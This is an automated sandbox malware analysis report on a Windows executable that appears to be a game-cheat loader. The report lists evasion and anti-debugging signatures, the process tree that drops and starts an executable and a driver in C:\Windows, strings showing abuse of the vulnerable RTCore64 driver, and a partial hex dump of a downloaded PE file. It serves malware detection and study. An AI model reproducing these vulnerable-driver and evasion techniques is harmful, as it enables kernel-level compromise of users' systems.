Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lUAc7lqa56.exe

Overview

General Information

Sample name:lUAc7lqa56.exe
renamed because original name is a hash value
Original sample name:4c428e14cf5fc2c5e54ba377389c8253.exe
Analysis ID:1541826
MD5:4c428e14cf5fc2c5e54ba377389c8253
SHA1:bb3972cfb6adc178d8fd17dde519d15a6471e4b9
SHA256:f142f2fefbbd174fbc0d3d6cbe4cb5caa48389dfce9ee63f10d82b503e705468
Tags:64exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Accesses win32k, likely to find offsets for exploits
Detected VMProtect packer
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to load drivers
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables driver privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • lUAc7lqa56.exe (PID: 2256 cmdline: "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5: 4C428E14CF5FC2C5E54BA377389C8253)
    • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4564 cmdline: C:\Windows\system32\cmd.exe /c cd C:\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6384 cmdline: C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • Vulnerability.exe (PID: 5448 cmdline: C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys MD5: 8619AFEC8BD66B2C589FC987D7D0B194)
        • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1744 cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • certutil.exe (PID: 2740 cmdline: certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 MD5: F17616EC0522FC5633151F7CAA278CAA)
        • WerFault.exe (PID: 5408 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • find.exe (PID: 2564 cmdline: find /i /v "md5" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • find.exe (PID: 3448 cmdline: find /i /v "certutil" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 5820 cmdline: C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3512 cmdline: cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6016 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • WerFault.exe (PID: 2588 cmdline: C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: lUAc7lqa56.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysAvira: detection malicious, Label: RKIT/Agent.ykqds
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exeAvira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\Vulnerability.exeAvira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\driverfo.sysAvira: detection malicious, Label: RKIT/Agent.ykqds
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exeReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysReversingLabs: Detection: 33%
Source: C:\Windows\Vulnerability.exeReversingLabs: Detection: 55%
Source: C:\Windows\driverfo.sysReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: lUAc7lqa56.exeReversingLabs: Detection: 37%
Source: lUAc7lqa56.exeVirustotal: Detection: 29%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exeJoe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: lUAc7lqa56.exeJoe Sandbox ML: detected
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_50b8f276-7

Exploits

barindex
Accesses win32k, likely to find offsets for exploits
Source: C:\Windows\Vulnerability.exeFile opened: C:\Windows\System32\win32k.sysJump to behavior
Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: lUAc7lqa56.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,4_2_00007FF7CC423B60
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 06:10:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 